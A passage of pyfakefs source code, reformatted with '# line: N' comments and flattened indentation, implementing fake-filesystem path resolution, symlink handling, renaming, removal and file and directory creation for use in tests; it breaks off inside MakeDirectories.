'Return True if file_path starts with a drive letter.\n New in pyfakefs 2.9.\n\n Args:\n file_path: the full path to be examined.\n\n Returns:\n True if drive letter support is enabled in the filesystem and\n the path starts with a drive letter.\n '
# line: 1497
colon = self._matching_string(file_path, ':')
# line: 1498
return (self.is_windows_fs and (len(file_path) >= 2) and file_path[:1].isalpha and (file_path[1:2] == colon))
# line: 1501
def _StartsWithRootPath(self, file_path):
# line: 1502
root_name = self._matching_string(file_path, self.root.name)
# line: 1503
return (file_path.startswith(root_name) or ((not self.is_case_sensitive) and file_path.lower().startswith(root_name.lower())) or self.StartsWithDriveLetter(file_path))
# line: 1508
def _IsRootPath(self, file_path):
# line: 1509
root_name = self._matching_string(file_path, self.root.name)
# line: 1510
return ((file_path == root_name) or ((not self.is_case_sensitive) and (file_path.lower() == root_name.lower())) or ((len(file_path) == 2) and self.StartsWithDriveLetter(file_path)))
# line: 1514
def _EndsWithPathSeparator(self, file_path):
# line: 1515
return (file_path and (file_path.endswith(self._path_separator(file_path)) or ((self.alternative_path_separator is not None) and file_path.endswith(self._alternative_path_separator(file_path)))))
# line: 1519
def _DirectoryContent(self, directory, component):
# line: 1520
if (not isinstance(directory, FakeDirectory)):
# line: 1521
return (None, None)
# line: 1522
if (component in directory.contents):
# line: 1523
return (component, directory.contents[component])
# line: 1524
if (not self.is_case_sensitive):
# line: 1525
matching_content = [(subdir, directory.contents[subdir]) for subdir in directory.contents if (subdir.lower() == component.lower())]
# line: 1528
if matching_content:
# line: 1529
return matching_content[0]
# line: 1531
return (None, None)
# line: 1533
def Exists(self, file_path):
# line: 1544
'Return true if a path points to an existing file system object.\n\n Args:\n file_path: path to examine.\n\n Returns:\n (bool) True if the corresponding object exists.\n\n Raises:\n TypeError: if file_path is None.\n '
# line: 1545
if (sys.version_info >= (3, 6)):
# line: 1546
file_path = os.fspath(file_path)
# line: 1547
if (file_path is None):
# line: 1548
raise TypeError
# line: 1549
if (not file_path):
# line: 1550
return False
# line: 1551
try:
# line: 1552
file_path = self.ResolvePath(file_path)
# line: 1553
except (IOError, OSError):
# line: 1554
return False
# line: 1555
if (file_path == self.root.name):
# line: 1556
return True
# line: 1557
path_components = self.GetPathComponents(file_path)
# line: 1558
current_dir = self.root
# line: 1559
for component in path_components:
# line: 1560
current_dir = self._DirectoryContent(current_dir, component)[1]
# line: 1561
if (not current_dir):
# line: 1562
return False
# line: 1563
return True
# line: 1565
def ResolvePath(self, file_path, allow_fd=False, raw_io=True):
# line: 1601
"Follow a path, resolving symlinks.\n\n ResolvePath traverses the filesystem along the specified file path,\n resolving file names and symbolic links until all elements of the path are\n exhausted, or we reach a file which does not exist. If all the elements\n are not consumed, they just get appended to the path resolved so far.\n This gives us the path which is as resolved as it can be, even if the file\n does not exist.\n\n This behavior mimics Unix semantics, and is best shown by example. Given a\n file system that looks like this:\n\n /a/b/\n /a/b/c -> /a/b2 c is a symlink to /a/b2\n /a/b2/x\n /a/c -> ../d\n /a/x -> y\n\n Then:\n /a/b/x => /a/b/x\n /a/c => /a/d\n /a/x => /a/y\n /a/b/c/d/e => /a/b2/d/e\n\n Args:\n file_path: path to examine.\n allow_fd: If `True`, `file_path` may be open file descriptor\n raw_io: `True` if called from low-level I/O functions\n\n Returns:\n resolved_path (string) or None.\n\n Raises:\n TypeError: if file_path is None.\n IOError: if file_path is '' or a part of the path doesn't exist.\n "
# line: 1603
def _ComponentsToPath(component_folders):
# line: 1604
sep = (self._path_separator(component_folders[0]) if component_folders else self.path_separator)
# line: 1606
path = sep.join(component_folders)
# line: 1607
if (not self._StartsWithRootPath(path)):
# line: 1608
path = (sep + path)
# line: 1609
return path
# line: 1611
def _ValidRelativePath(file_path):
# line: 1612
slash_dotdot = self._matching_string(file_path, '/..')
# line: 1613
while (file_path and (slash_dotdot in file_path)):
# line: 1614
file_path = file_path[:file_path.rfind(slash_dotdot)]
# line: 1615
if (not self.Exists(self.NormalizePath(file_path))):
# line: 1616
return False
# line: 1617
return True
# line: 1619
def _FollowLink(link_path_components, link):
# line: 1639
'Follow a link w.r.t. a path resolved so far.\n\n The component is either a real file, which is a no-op, or a symlink.\n In the case of a symlink, we have to modify the path as built up so far\n /a/b => ../c should yield /a/../c (which will normalize to /a/c)\n /a/b => x should yield /a/x\n /a/b => /x/y/z should yield /x/y/z\n The modified path may land us in a new spot which is itself a\n link, so we may repeat the process.\n\n Args:\n link_path_components: The resolved path built up to the link so far.\n link: The link object itself.\n\n Returns:\n (string) the updated path resolved after following the link.\n\n Raises:\n IOError: if there are too many levels of symbolic link\n '
# line: 1640
link_path = link.contents
# line: 1641
sep = self._path_separator(link_path)
# line: 1642
alt_sep = self._alternative_path_separator(link_path)
# line: 1646
if ((not link_path.startswith(sep)) and ((alt_sep is None) or (not link_path.startswith(alt_sep)))):
# line: 1652
components = link_path_components[:(-1)]
# line: 1653
components.append(link_path)
# line: 1654
link_path = sep.join(components)
# line: 1656
return self.CollapsePath(link_path)
# line: 1658
if (allow_fd and (sys.version_info >= (3, 3)) and isinstance(file_path, int)):
# line: 1659
return self.GetOpenFile(file_path).GetObject().GetPath()
# line: 1661
if (sys.version_info >= (3, 6)):
# line: 1662
file_path = os.fspath(file_path)
# line: 1663
if (file_path is None):
# line: 1665
raise TypeError('Expected file system path string, received None')
# line: 1666
if ((not file_path) or (not _ValidRelativePath(file_path))):
# line: 1669
raise IOError(errno.ENOENT, ("No such file or directory: '%s'" % file_path))
# line: 1671
file_path = self.NormalizePath(self.NormalizeCase(file_path))
# line: 1672
if self._IsRootPath(file_path):
# line: 1673
return file_path
# line: 1675
current_dir = self.root
# line: 1676
path_components = self.GetPathComponents(file_path)
# line: 1678
resolved_components = []
# line: 1679
link_depth = 0
# line: 1680
while path_components:
# line: 1681
component = path_components.pop(0)
# line: 1682
resolved_components.append(component)
# line: 1683
current_dir = self._DirectoryContent(current_dir, component)[1]
# line: 1684
if (current_dir is None):
# line: 1690
resolved_components.extend(path_components)
# line: 1691
break
# line: 1694
if stat.S_ISLNK(current_dir.st_mode):
# line: 1698
if (link_depth > _MAX_LINK_DEPTH):
# line: 1699
error_class = (OSError if raw_io else IOError)
# line: 1700
raise error_class(errno.ELOOP, ("Too many levels of symbolic links: '%s'" % _ComponentsToPath(resolved_components)))
# line: 1704
link_path = _FollowLink(resolved_components, current_dir)
# line: 1708
target_components = self.GetPathComponents(link_path)
# line: 1709
path_components = (target_components + path_components)
# line: 1710
resolved_components = []
# line: 1711
current_dir = self.root
# line: 1712
link_depth += 1
# line: 1713
return _ComponentsToPath(resolved_components)
# line: 1715
def GetObjectFromNormalizedPath(self, file_path):
# line: 1727
'Search for the specified filesystem object within the fake filesystem.\n\n Args:\n file_path: specifies target FakeFile object to retrieve, with a\n path that has already been normalized/resolved.\n\n Returns:\n the FakeFile object corresponding to file_path.\n\n Raises:\n IOError: if the object is not found.\n '
# line: 1728
if (sys.version_info >= (3, 6)):
# line: 1729
file_path = os.fspath(file_path)
# line: 1730
if (file_path == self.root.name):
# line: 1731
return self.root
# line: 1732
path_components = self.GetPathComponents(file_path)
# line: 1733
target_object = self.root
# line: 1734
try:
# line: 1735
for component in path_components:
# line: 1736
if stat.S_ISLNK(target_object.st_mode):
# line: 1737
target_object = self.ResolveObject(target_object.contents)
# line: 1738
if (not stat.S_ISDIR(target_object.st_mode)):
# line: 1739
if (not self.is_windows_fs):
# line: 1740
raise IOError(errno.ENOTDIR, 'Not a directory in fake filesystem', file_path)
# line: 1743
raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', file_path)
# line: 1746
target_object = target_object.GetEntry(component)
# line: 1747
except KeyError:
# line: 1748
raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', file_path)
# line: 1751
return target_object
# line: 1753
def GetObject(self, file_path):
# line: 1764
'Search for the specified filesystem object within the fake filesystem.\n\n Args:\n file_path: specifies target FakeFile object to retrieve.\n\n Returns:\n the FakeFile object corresponding to file_path.\n\n Raises:\n IOError: if the object is not found.\n '
# line: 1765
if (sys.version_info >= (3, 6)):
# line: 1766
file_path = os.fspath(file_path)
# line: 1767
file_path = self.NormalizePath(self.NormalizeCase(file_path))
# line: 1768
return self.GetObjectFromNormalizedPath(file_path)
# line: 1770
def ResolveObject(self, file_path, follow_symlinks=True, allow_fd=False):
# line: 1784
'Search for the specified filesystem object, resolving all links.\n\n Args:\n file_path: Specifies target FakeFile object to retrieve.\n follow_symlinks: If `False`, the link itself is resolved,\n otherwise the object linked to.\n allow_fd: If `True`, `file_path` may be open file descriptor\n\n Returns:\n the FakeFile object corresponding to file_path.\n\n Raises:\n IOError: if the object is not found.\n '
# line: 1785
if (allow_fd and (sys.version_info >= (3, 3)) and isinstance(file_path, int)):
# line: 1786
return self.GetOpenFile(file_path).GetObject()
# line: 1788
if follow_symlinks:
# line: 1789
if (sys.version_info >= (3, 6)):
# line: 1790
file_path = os.fspath(file_path)
# line: 1791
return self.GetObjectFromNormalizedPath(self.ResolvePath(file_path))
# line: 1792
return self.LResolveObject(file_path)
# line: 1794
def LResolveObject(self, path):
# line: 1808
'Search for the specified object, resolving only parent links.\n\n This is analogous to the stat/lstat difference. This resolves links *to*\n the object but not of the final object itself.\n\n Args:\n path: specifies target FakeFile object to retrieve.\n\n Returns:\n the FakeFile object corresponding to path.\n\n Raises:\n IOError: if the object is not found.\n '
# line: 1809
if (sys.version_info >= (3, 6)):
# line: 1810
path = os.fspath(path)
# line: 1811
if (path == self.root.name):
# line: 1813
return self.root
# line: 1816
sep = self._path_separator(path)
# line: 1817
alt_sep = self._alternative_path_separator(path)
# line: 1818
if (path.endswith(sep) or (alt_sep and path.endswith(alt_sep))):
# line: 1819
path = path[:(-1)]
# line: 1821
(parent_directory, child_name) = self.SplitPath(path)
# line: 1822
if (not parent_directory):
# line: 1823
parent_directory = self.cwd
# line: 1824
try:
# line: 1825
parent_obj = self.ResolveObject(parent_directory)
# line: 1826
assert parent_obj
# line: 1827
if (not isinstance(parent_obj, FakeDirectory)):
# line: 1828
if ((not self.is_windows_fs) and isinstance(parent_obj, FakeFile)):
# line: 1829
raise IOError(errno.ENOTDIR, 'The parent object is not a directory', path)
# line: 1831
raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
# line: 1834
return parent_obj.GetEntry(child_name)
# line: 1835
except KeyError:
# line: 1836
raise IOError(errno.ENOENT, 'No such file or directory in the fake filesystem', path)
# line: 1840
def AddObject(self, file_path, file_object, error_class=OSError):
# line: 1851
'Add a fake file or directory into the filesystem at file_path.\n\n Args:\n file_path: the path to the file to be added relative to self.\n file_object: file or directory to add.\n error_class: the error class to be thrown if file_path does\n not correspond to a directory (used internally(\n\n Raises:\n IOError or OSError: if file_path does not correspond to a directory.\n '
# line: 1852
if (not file_path):
# line: 1853
target_directory = self.root
else:
# line: 1855
target_directory = self.ResolveObject(file_path)
# line: 1856
if (not stat.S_ISDIR(target_directory.st_mode)):
# line: 1857
raise error_class(errno.ENOTDIR, 'Not a directory in the fake filesystem', file_path)
# line: 1860
target_directory.AddEntry(file_object)
# line: 1862
def RenameObject(self, old_file_path, new_file_path, force_replace=False):
# line: 1883
'Renames a FakeFile object at old_file_path to new_file_path, preserving all properties.\n\n Args:\n old_file_path: Path to filesystem object to rename.\n new_file_path: Path to where the filesystem object will live after this call.\n force_replace: If set and destination is an existing file, it will be replaced\n even under Windows if the user has permissions, otherwise replacement\n happens under Unix only.\n\n Raises:\n OSError: if old_file_path does not exist.\n OSError: if new_file_path is an existing directory\n (Windows, or Posix if old_file_path points to a regular file)\n OSError: if old_file_path is a directory and new_file_path a file\n OSError: if new_file_path is an existing file and force_replace not set\n (Windows only).\n OSError: if new_file_path is an existing file and could not be removed\n (Posix, or Windows with force_replace set).\n OSError: if dirname(new_file_path) does not exist.\n OSError: if the file would be moved to another filesystem (e.g. mount point).\n '
# line: 1884
old_file_path = self.NormalizePath(old_file_path)
# line: 1885
new_file_path = self.NormalizePath(new_file_path)
# line: 1886
if ((not self.Exists(old_file_path)) and (not self.IsLink(old_file_path))):
# line: 1887
raise OSError(errno.ENOENT, 'Fake filesystem object: can not rename nonexistent file', old_file_path)
# line: 1891
old_object = self.LResolveObject(old_file_path)
# line: 1892
if (not self.is_windows_fs):
# line: 1893
if (self.IsDir(old_file_path, follow_symlinks=False) and self.IsLink(new_file_path)):
# line: 1895
raise OSError(errno.ENOTDIR, 'Cannot rename directory to symlink', new_file_path)
# line: 1898
if (self.IsDir(new_file_path, follow_symlinks=False) and self.IsLink(old_file_path)):
# line: 1900
raise OSError(errno.EISDIR, 'Cannot rename symlink to directory', new_file_path)
# line: 1904
if (self.Exists(new_file_path) or self.IsLink(new_file_path)):
# line: 1905
if (old_file_path == new_file_path):
# line: 1906
return
# line: 1908
new_object = self.GetObject(new_file_path)
# line: 1909
if (old_object == new_object):
# line: 1910
if (old_file_path.lower() == new_file_path.lower()):
# line: 1912
pass
else:
# line: 1915
return
elif (stat.S_ISDIR(new_object.st_mode) or stat.S_ISLNK(new_object.st_mode)):
# line: 1918
if self.is_windows_fs:
# line: 1919
if force_replace:
# line: 1920
raise OSError(errno.EACCES, 'Fake filesystem object: can not replace existing directory', new_file_path)
else:
# line: 1924
raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to existing directory', new_file_path)
# line: 1927
if (not stat.S_ISLNK(new_object.st_mode)):
# line: 1928
if new_object.contents:
# line: 1929
raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to non-empty directory', new_file_path)
# line: 1932
if stat.S_ISREG(old_object.st_mode):
# line: 1933
raise OSError(errno.EISDIR, 'Fake filesystem object: cannot rename file to directory', new_file_path)
elif stat.S_ISDIR(old_object.st_mode):
# line: 1937
raise OSError(errno.ENOTDIR, 'Fake filesystem object: cannot rename directory to file', new_file_path)
elif (self.is_windows_fs and (not force_replace)):
# line: 1941
raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to existing file', new_file_path)
else:
# line: 1945
try:
# line: 1946
self.RemoveObject(new_file_path)
# line: 1947
except IOError as exc:
# line: 1948
raise OSError(exc.errno, exc.strerror, exc.filename)
# line: 1950
(old_dir, old_name) = self.SplitPath(old_file_path)
# line: 1951
(new_dir, new_name) = self.SplitPath(new_file_path)
# line: 1952
if (not self.Exists(new_dir)):
# line: 1953
raise OSError(errno.ENOENT, 'No such fake directory', new_dir)
# line: 1954
old_dir_object = self.ResolveObject(old_dir)
# line: 1955
new_dir_object = self.ResolveObject(new_dir)
# line: 1956
if (old_dir_object.st_dev != new_dir_object.st_dev):
# line: 1957
raise OSError(errno.EXDEV, 'Fake filesystem object: cannot rename across file systems', old_file_path)
# line: 1960
if (not stat.S_ISDIR(new_dir_object.st_mode)):
# line: 1961
raise OSError((errno.EACCES if self.is_windows_fs else errno.ENOTDIR), 'Fake filesystem object: target parent is not a directory', new_file_path)
# line: 1964
if new_dir_object.HasParentObject(old_object):
# line: 1965
raise OSError(errno.EINVAL, 'Fake filesystem object: invalid target for rename', new_file_path)
# line: 1969
object_to_rename = old_dir_object.GetEntry(old_name)
# line: 1970
old_dir_object.RemoveEntry(old_name, recursive=False)
# line: 1971
object_to_rename.name = new_name
# line: 1972
if (new_name in new_dir_object.contents):
# line: 1974
new_dir_object.RemoveEntry(new_name)
# line: 1975
new_dir_object.AddEntry(object_to_rename)
# line: 1977
def RemoveObject(self, file_path):
# line: 1987
"Remove an existing file or directory.\n\n Args:\n file_path: the path to the file relative to self.\n\n Raises:\n IOError: if file_path does not correspond to an existing file, or if part\n of the path refers to something other than a directory.\n OSError: if the directory is in use (eg, if it is '/').\n "
# line: 1988
file_path = self.NormalizePath(self.NormalizeCase(file_path))
# line: 1989
if self._IsRootPath(file_path):
# line: 1990
raise OSError(errno.EBUSY, 'Fake device or resource busy', file_path)
# line: 1992
try:
# line: 1993
(dirname, basename) = self.SplitPath(file_path)
# line: 1994
target_directory = self.ResolveObject(dirname)
# line: 1995
target_directory.RemoveEntry(basename)
# line: 1996
except KeyError:
# line: 1997
raise IOError(errno.ENOENT, 'No such file or directory in the fake filesystem', file_path)
# line: 2000
except AttributeError:
# line: 2001
raise IOError(errno.ENOTDIR, 'Not a directory in the fake filesystem', file_path)
# line: 2005
def CreateDirectory(self, directory_path, perm_bits=PERM_DEF):
# line: 2019
'Create directory_path, and all the parent directories.\n\n Helper method to set up your test faster.\n\n Args:\n directory_path: The full directory path to create.\n perm_bits: The permission bits as set by `chmod`.\n\n Returns:\n the newly created FakeDirectory object.\n\n Raises:\n OSError: if the directory already exists.\n '
# line: 2020
directory_path = self.NormalizePath(directory_path)
# line: 2021
self._AutoMountDriveIfNeeded(directory_path)
# line: 2022
if self.Exists(directory_path):
# line: 2023
raise OSError(errno.EEXIST, 'Directory exists in fake filesystem', directory_path)
# line: 2026
path_components = self.GetPathComponents(directory_path)
# line: 2027
current_dir = self.root
# line: 2029
new_dirs = []
# line: 2030
for component in path_components:
# line: 2031
directory = self._DirectoryContent(current_dir, component)[1]
# line: 2032
if (not directory):
# line: 2033
new_dir = FakeDirectory(component, filesystem=self)
# line: 2034
new_dirs.append(new_dir)
# line: 2035
current_dir.AddEntry(new_dir)
# line: 2036
current_dir = new_dir
else:
# line: 2038
if stat.S_ISLNK(directory.st_mode):
# line: 2039
directory = self.ResolveObject(directory.contents)
# line: 2040
current_dir = directory
# line: 2041
if ((directory.st_mode & stat.S_IFDIR) != stat.S_IFDIR):
# line: 2042
raise OSError(errno.ENOTDIR, 'Not a directory', current_dir.GetPath())
# line: 2046
for new_dir in new_dirs:
# line: 2047
new_dir.st_mode = (stat.S_IFDIR | perm_bits)
# line: 2049
self._last_ino += 1
# line: 2050
current_dir.SetIno(self._last_ino)
# line: 2051
return current_dir
# line: 2053
def CreateFile(self, file_path, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents='', st_size=None, create_missing_dirs=True, apply_umask=False, encoding=None, errors=None):
# line: 2079
'Create file_path, including all the parent directories along the way.\n\n This helper method can be used to set up tests more easily.\n\n Args:\n file_path: The path to the file to create.\n st_mode: The stat constant representing the file type.\n contents: The contents of the file.\n st_size: The file size; only valid if contents not given.\n create_missing_dirs: If `True`, auto create missing directories.\n apply_umask: `True` if the current umask must be applied on st_mode.\n encoding: Ff contents is a unicode string, the encoding used\n for serialization.\n New in pyfakefs 2.9.\n errors: The error mode used for encoding/decoding errors.\n New in pyfakefs 3.2.\n\n Returns:\n the newly created FakeFile object.\n\n Raises:\n IOError: if the file already exists.\n IOError: if the containing directory is required and missing.\n '
# line: 2080
return self.CreateFileInternally(file_path, st_mode, contents, st_size, create_missing_dirs, apply_umask, encoding, errors)
# line: 2084
def add_real_file(self, file_path, read_only=True):
# line: 2109
"Create file_path, including all the parent directories along the way, for an existing\n real file. The contents of the real file are read only on demand.\n New in pyfakefs 3.2.\n\n Args:\n file_path: Path to an existing file in the real file system\n read_only: If `True` (the default), writing to the fake file\n raises an exception. Otherwise, writing to the file changes\n the fake file only.\n\n Returns:\n the newly created FakeFile object.\n\n Raises:\n OSError: if the file does not exist in the real file system.\n IOError: if the file already exists in the fake file system.\n\n .. note:: On MacOS and BSD, accessing the fake file's contents will update both the real and fake files' `atime.` (access time). In this particular case, `add_real_file()` violates the rule that `pyfakefs` must not modify the real file system. Further, Windows offers the option to enable atime, and older versions of Linux may also modify atime.\n "
# line: 2110
return self.CreateFileInternally(file_path, read_from_real_fs=True, read_only=read_only)
# line: 2114
def add_real_directory(self, dir_path, read_only=True, lazy_read=True):
# line: 2139
'Create a fake directory corresponding to the real directory at the specified\n path. Add entries in the fake directory corresponding to the entries in the\n real directory.\n New in pyfakefs 3.2.\n\n Args:\n dir_path: The path to the existing directory.\n read_only: If set, all files under the directory are treated as\n read-only, e.g. a write access raises an exception;\n otherwise, writing to the files changes the fake files only\n as usually.\n lazy_read: If set (default), directory contents are only read when\n accessed, and only until the needed subdirectory level.\n *Note:* this means that the file system size is only updated\n at the time the directory contents are read; set this to\n `False` only if you are dependent on accurate file system\n size in your test\n\n Returns:\n the newly created FakeDirectory object.\n\n Raises:\n OSError: if the directory does not exist in the real file system.\n IOError: if the directory already exists in the fake file system.\n '
# line: 2140
if (not os.path.exists(dir_path)):
# line: 2141
raise IOError(errno.ENOENT, 'No such directory', dir_path)
# line: 2142
if lazy_read:
# line: 2143
parent_path = os.path.split(dir_path)[0]
# line: 2144
if self.Exists(parent_path):
# line: 2145
parent_dir = self.GetObject(parent_path)
else:
# line: 2147
parent_dir = self.CreateDirectory(parent_path)
# line: 2148
new_dir = FakeDirectoryFromRealDirectory(dir_path, filesystem=self, read_only=read_only)
# line: 2149
parent_dir.AddEntry(new_dir)
# line: 2150
self._last_ino += 1
# line: 2151
new_dir.SetIno(self._last_ino)
else:
# line: 2153
new_dir = self.CreateDirectory(dir_path)
# line: 2154
for (base, _, files) in os.walk(dir_path):
# line: 2155
for fileEntry in files:
# line: 2156
self.add_real_file(os.path.join(base, fileEntry), read_only)
# line: 2157
return new_dir
# line: 2159
def add_real_paths(self, path_list, read_only=True, lazy_dir_read=True):
# line: 2176
'This convenience method adds multiple files and/or directories from the\n real file system to the fake file system. See `add_real_file()` and\n `add_real_directory()`.\n New in pyfakefs 3.2.\n\n Args:\n path_list: List of file and directory paths in the real file system.\n read_only: If set, all files and files under under the directories are treated as read-only,\n e.g. a write access raises an exception;\n otherwise, writing to the files changes the fake files only as usually.\n lazy_dir_read: Uses lazy reading of directory contents if set\n (see `add_real_directory`)\n\n Raises:\n OSError: if any of the files and directories in the list does not exist in the real file system.\n OSError: if any of the files and directories in the list already exists in the fake file system.\n '
# line: 2177
for path in path_list:
# line: 2178
if os.path.isdir(path):
# line: 2179
self.add_real_directory(path, read_only, lazy_dir_read)
else:
# line: 2181
self.add_real_file(path, read_only)
# line: 2183
def CreateFileInternally(self, file_path, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents='', st_size=None, create_missing_dirs=True, apply_umask=False, encoding=None, errors=None, read_from_real_fs=False, read_only=True, raw_io=False):
# line: 2203
'Internal fake file creator that supports both normal fake files and fake\n files based on real files.\n\n Args:\n file_path: path to the file to create.\n st_mode: the stat.S_IF constant representing the file type.\n contents: the contents of the file.\n st_size: file size; only valid if contents not given.\n create_missing_dirs: if True, auto create missing directories.\n apply_umask: whether or not the current umask must be applied on st_mode.\n encoding: if contents is a unicode string, the encoding used for serialization.\n errors: the error mode used for encoding/decoding errors\n read_from_real_fs: if True, the contents are reaf from the real file system on demand.\n read_only: if set, the file is treated as read-only, e.g. a write access raises an exception;\n otherwise, writing to the file changes the fake file only as usually.\n raw_io: `True` if called from low-level API (`os.open`)\n '
# line: 2204
error_class = (OSError if raw_io else IOError)
# line: 2205
file_path = self.NormalizePath(file_path)
# line: 2208
if (self.Exists(file_path) or self.IsLink(file_path)):
# line: 2209
raise OSError(errno.EEXIST, 'File already exists in fake filesystem', file_path)
# line: 2212
(parent_directory, new_file) = self.SplitPath(file_path)
# line: 2213
if (not parent_directory):
# line: 2214
parent_directory = self.cwd
# line: 2215
self._AutoMountDriveIfNeeded(parent_directory)
# line: 2216
if (not self.Exists(parent_directory)):
# line: 2217
if (not create_missing_dirs):
# line: 2218
raise error_class(errno.ENOENT, 'No such fake directory', parent_directory)
# line: 2219
self.CreateDirectory(parent_directory)
else:
# line: 2221
parent_directory = self.NormalizeCase(parent_directory)
# line: 2222
if apply_umask:
# line: 2223
st_mode &= (~ self.umask)
# line: 2224
if read_from_real_fs:
# line: 2225
file_object = FakeFileFromRealFile(file_path, filesystem=self, read_only=read_only)
else:
# line: 2227
file_object = FakeFile(new_file, st_mode, filesystem=self, encoding=encoding, errors=errors)
# line: 2229
self._last_ino += 1
# line: 2230
file_object.SetIno(self._last_ino)
# line: 2231
self.AddObject(parent_directory, file_object, error_class)
# line: 2233
if ((not read_from_real_fs) and ((contents is not None) or (st_size is not None))):
# line: 2234
try:
# line: 2235
if (st_size is not None):
# line: 2236
file_object.SetLargeFileSize(st_size)
else:
# line: 2238
file_object._set_initial_contents(contents)
# line: 2239
except IOError:
# line: 2240
self.RemoveObject(file_path)
# line: 2241
raise
# line: 2243
return file_object
# line: 2246
def CreateLink(self, file_path, link_target, create_missing_dirs=True):
# line: 2261
'Create the specified symlink, pointed at the specified link target.\n\n Args:\n file_path: path to the symlink to create\n link_target: the target of the symlink\n create_missing_dirs: If `True`, any missing parent directories of\n file_path will be created\n\n Returns:\n the newly created FakeFile object.\n\n Raises:\n OSError: if the symlink could not be created (see `CreateFile`).\n OSError: if on Windows before Python 3.2.\n '
# line: 2262
if (not self._IsLinkSupported()):
# line: 2263
raise OSError('Symbolic links are not supported on Windows before Python 3.2')
# line: 2265
if (not self.IsLink(file_path)):
# line: 2266
file_path = self.ResolvePath(file_path)
# line: 2267
if (sys.version_info >= (3, 6)):
# line: 2268
link_target = os.fspath(link_target)
# line: 2269
return self.CreateFileInternally(file_path, st_mode=(stat.S_IFLNK | PERM_DEF), contents=link_target, create_missing_dirs=create_missing_dirs, raw_io=True)
# line: 2273
def CreateHardLink(self, old_path, new_path):
# line: 2289
"Create a hard link at new_path, pointing at old_path.\n New in pyfakefs 2.9.\n\n Args:\n old_path: an existing link to the target file.\n new_path: the destination path to create a new link at.\n\n Returns:\n the FakeFile object referred to by old_path.\n\n Raises:\n OSError: if something already exists at new_path.\n OSError: if old_path is a directory.\n OSError: if the parent directory doesn't exist.\n OSError: if on Windows before Python 3.2.\n "
# line: 2290
if (not self._IsLinkSupported()):
# line: 2291
raise OSError('Links are not supported on Windows before Python 3.2')
# line: 2292
new_path_normalized = self.NormalizePath(new_path)
# line: 2293
if self.Exists(new_path_normalized):
# line: 2294
raise OSError(errno.EEXIST, 'File already exists in fake filesystem', new_path)
# line: 2298
(new_parent_directory, new_basename) = self.SplitPath(new_path_normalized)
# line: 2299
if (not new_parent_directory):
# line: 2300
new_parent_directory = self.cwd
# line: 2302
if (not self.Exists(new_parent_directory)):
# line: 2303
raise OSError(errno.ENOENT, 'No such fake directory', new_parent_directory)
# line: 2307
try:
# line: 2308
old_file = self.ResolveObject(old_path)
# line: 2309
except:
# line: 2310
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', old_path)
# line: 2314
if (old_file.st_mode & stat.S_IFDIR):
# line: 2315
raise OSError((errno.EACCES if self.is_windows_fs else errno.EPERM), 'Cannot create hard link to directory', old_path)
# line: 2320
old_file.name = new_basename
# line: 2321
self.AddObject(new_parent_directory, old_file)
# line: 2322
return old_file
# line: 2324
def ReadLink(self, path):
# line: 2338
'Read the target of a symlink.\n New in pyfakefs 3.0.\n\n Args:\n path: symlink to read the target of.\n\n Returns:\n the string representing the path to which the symbolic link points.\n\n Raises:\n TypeError: if path is None\n OSError: (with errno=ENOENT) if path is not a valid path, or\n (with errno=EINVAL) if path is valid, but is not a symlink.\n '
# line: 2339
if (path is None):
# line: 2340
raise TypeError
# line: 2341
try:
# line: 2342
link_obj = self.LResolveObject(path)
# line: 2343
except IOError as exc:
# line: 2344
raise OSError(exc.errno, 'Fake path does not exist', path)
# line: 2345
if (stat.S_IFMT(link_obj.st_mode) != stat.S_IFLNK):
# line: 2346
raise OSError(errno.EINVAL, 'Fake filesystem: not a symlink', path)
# line: 2347
return link_obj.contents
# line: 2349
def MakeDirectory(self, dir_name, mode=PERM_DEF):
# line: 2362
"Create a leaf Fake directory.\n New in pyfakefs 3.0.\n\n Args:\n dir_name: (str) Name of directory to create. Relative paths are assumed\n to be relative to '/'.\n mode: (int) Mode to create directory with. This argument defaults to\n 0o777. The umask is applied to this mode.\n\n Raises:\n OSError: if the directory name is invalid or parent directory is read only\n or as per `FakeFilesystem.AddObject()`.\n "
# line: 2363
if (sys.version_info >= (3, 6)):
# line: 2364
dir_name = os.fspath(dir_name)
# line: 2365
if self._EndsWithPathSeparator(dir_name):
# line: 2366
dir_name = dir_name[:(-1)]
# line: 2367
if (not dir_name):
# line: 2368
raise OSError(errno.ENOENT, 'Empty directory name')
# line: 2370
(parent_dir, _) = self.SplitPath(dir_name)
# line: 2371
if parent_dir:
# line: 2372
base_dir = self.CollapsePath(parent_dir)
# line: 2373
ellipsis = self._matching_string(parent_dir, (self.path_separator + '..'))
# line: 2374
if parent_dir.endswith(ellipsis):
# line: 2375
(base_dir, dummy_dotdot, _) = parent_dir.partition(ellipsis)
# line: 2376
if (not self.Exists(base_dir)):
# line: 2377
raise OSError(errno.ENOENT, 'No such fake directory', base_dir)
# line: 2379
dir_name = self.NormalizePath(dir_name)
# line: 2380
if self.Exists(dir_name):
# line: 2381
raise OSError(errno.EEXIST, 'Fake object already exists', dir_name)
# line: 2382
(head, tail) = self.SplitPath(dir_name)
# line: 2384
self.AddObject(head, FakeDirectory(tail, (mode & (~ self.umask)), filesystem=self))
# line: 2387
def MakeDirectories(self, dir_name, mode=PERM_DEF, exist_ok=False):
# line: 2402
'Create a leaf Fake directory and create any non-existent parent dirs.\n New in pyfakefs 3.0.\n\n Args:\n dir_name: (str) Name of directory to create.\n mode: (int) Mode to create directory (and any necessary parent\n directories) with. This argument defaults to 0o777. The umask is\n applied to this mode.\n exist_ok: (boolean) If exist_ok is False (the default), an OSError is\n raised if the target directory already exists. New in Python 3.2.\n\n Raises:\n OSError: if the directory already exists and exist_ok=False, or as per\n `FakeFilesystem.CreateDirectory()`.\n '
# line: 2403
dir_name = self.NormalizePath(dir_name)
# line: 2404
path_components = self.GetPathComponents(dir_name)
# line: 2408
current_dir = self.root
# line: 2409
for component in path_components:
# line: 2410
if ((component not in current_dir.contents) or (not isinstance(current_dir.contents, dict))):
# line: 2412
break
else:
# line: 2414
current_dir = current_dir.contents[component]
# line: 2415
try:
# line: 2416
self.CreateDirectory(dir_name, (mode & (~ self.umask)))
# line: 2417
except (IOError, OSError) as e:
# line: 2418
